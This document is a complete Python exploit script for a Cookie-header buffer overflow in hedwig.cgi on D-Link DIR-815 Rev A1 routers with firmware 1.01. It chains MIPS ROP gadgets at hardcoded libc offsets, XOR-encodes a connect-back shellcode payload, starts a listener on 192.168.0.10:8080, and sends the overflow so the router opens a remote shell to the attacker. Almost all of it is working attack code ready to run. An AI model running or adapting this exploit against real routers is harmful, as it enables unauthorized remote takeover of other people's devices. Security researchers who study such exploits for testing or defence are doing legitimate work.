D-Link DIR-815 HTTP "Cookie:" buffer overflow

1. #!/usr/bin/env python
2.  
3. #Author: Zachary Cutlip
4. #        uid000 AT gmail dot com
5. #        Twitter:@zcutlip
6. #Target: DIR-815 Rev A1
7. #Firmware: 1.01
8. #hedwig.cgi buffer overflow in HTTP header field Cookie: uid="<cookie value>"
9.  
10.  
11. import sys
12.  
13. from bowcaster.development import OverflowBuffer
14. from bowcaster.development import SectionCreator
15. from bowcaster.common.support import LittleEndian
16. from bowcaster.common.support import Logging
17. from bowcaster.payloads.mips.connectback_payload import ConnectbackPayload
18. from bowcaster.servers.connectback_server import ConnectbackServer
19. from bowcaster.encoders.mips import MipsXorEncoder
20. from bowcaster.clients.http import HttpClient
21.  
22. CALLBACK_IP="192.168.0.10"
23.  
24. def build_overflow(logger=None):
25.     badchars=["\x00","\x20","\r","\n","\""]
26.     libc_base_address=0x2aaf8000
27.     reg_s0=1007
28.     reg_s1=1011
29.     reg_s2=1015
30.     reg_s3=1019
31.     reg_s4=1023
32.     reg_s5=1027
33.     reg_s6=1031
34.     reg_s7=1035
35.     reg_pc=1043
36.    
37.     reg_new_ra=1075
38.    
39.     stack_return=1351
40.    
41.     SC=SectionCreator(LittleEndian,base_address=libc_base_address,badchars=badchars,logger=logger)
42.    
43.     ###########################################################################
44.     # Stages a 2 sec arg to sleep() in $a0
45.     # Stages 0x20+var4($sp) in $ra; return address for sleep()
46.     # Jumps to $s0
47.     ###########################################################################
48.     SC.gadget_section(reg_pc,0x0004FA3C,
49.                         description="stage arg to sleep in $a0, stage return from sleep in $ra,jalr $s0")
50.    
51.  
52.     ###########################################################################
53.     # Address of sleep() function
54.     ###########################################################################
55.     SC.gadget_section(reg_s0,0x56bd0,description="Address of sleep()")
56.    
57.    
58.     ###########################################################################
59.     # Stackfinder. Load the following:
60.     #   $s4=$sp+0x5d0+var_5b4
61.     #   $s2=$sp+0x5d0+var_428
62.     #   $s0=$sp+0x5d0+var_4c0
63.     # Then jalr $s6
64.     ###########################################################################
65.     SC.gadget_section(reg_new_ra,0x000255FC,
66.                             description="Sleep() returns here.")    
67.    
68.     ###########################################################################
69.     # Jalr to $s0, which should point to the stack.
70.     ###########################################################################
71.     SC.gadget_section(reg_s6,0x000159D8,description="jalr to $s0")
72.    
73.     payload=ConnectbackPayload(CALLBACK_IP,LittleEndian)
74.     encoded_payload=MipsXorEncoder(payload,badchars=badchars,logger=logger)
75.    
76.     SC.string_section(1351,encoded_payload.shellcode,
77.                         description="XOR Encoded connect-back payload. connects back to 192.168.0.10:8080.")
78.    
79.     buf=OverflowBuffer(LittleEndian,2048,overflow_sections=SC.section_list,logger=logger)
80.    
81.    
82.     return buf
83.  
84.  
85. def send_overflow(buf,target_ip,logger):
86.     client=HttpClient()
87.     headers={}
88.     headers["Referer"]="http://192.168.0.1/bsc_wlan.php"
89.     headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
90.     headers["Connection"]="keep-alive"
91.     headers["Cookie"]="uid=%s" % str(buf)
92.     url="http://%s/hedwig.cgi" % target_ip
93.    
94.     post_data='SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
95.     logger.LOG_INFO("Sending post request.")
96.     try:
97.         client.send(url,headers=headers,post_data=post_data,urlencode=True)
98.     except Exception as e:
99.         print e
100.     return
101.  
102. def find_offset(buf,find_data):
103.     if find_data.startswith("0x"):
104.         find_data=int(find_data,0)
105.         Logging().LOG_DEBUG("Finding %#010x" % find_data)
106.     offset=buf.find_offset(find_data)
107.    
108.     return offset
109.  
110. def main(command):
111.    
112.     logger=Logging()
113.     logger.LOG_INFO("Bulding overflow.")
114.     buf=build_overflow(logger)
115.    
116.    
117.     if command.startswith("find="):
118.         find_string=command.split("find=")[1]
119.         offset=find_offset(buf,find_string)
120.         logger.LOG_INFO("Offset of %s: %d" %(find_string,offset))
121.         sys.exit(0)
122.  
123.     logger.LOG_INFO("Starting server.")
124.     server=ConnectbackServer(CALLBACK_IP,port=8080,logger=logger)
125.     pid=server.serve()
126.    
127.     target_ip=command
128.     if pid:
129.         try:
130.             send_overflow(buf,target_ip,logger)
131.             server.wait()
132.         except Exception as e:
133.             print e
134.             server.shutdown()
135.     else:
136.         logger.LOG_WARN("Failed to start connect-back server.")
137.         sys.exit(1)
138.  
139.     logger.LOG_INFO("Done.")
140.  
141. if __name__=="__main__":
142.     main(sys.argv[1])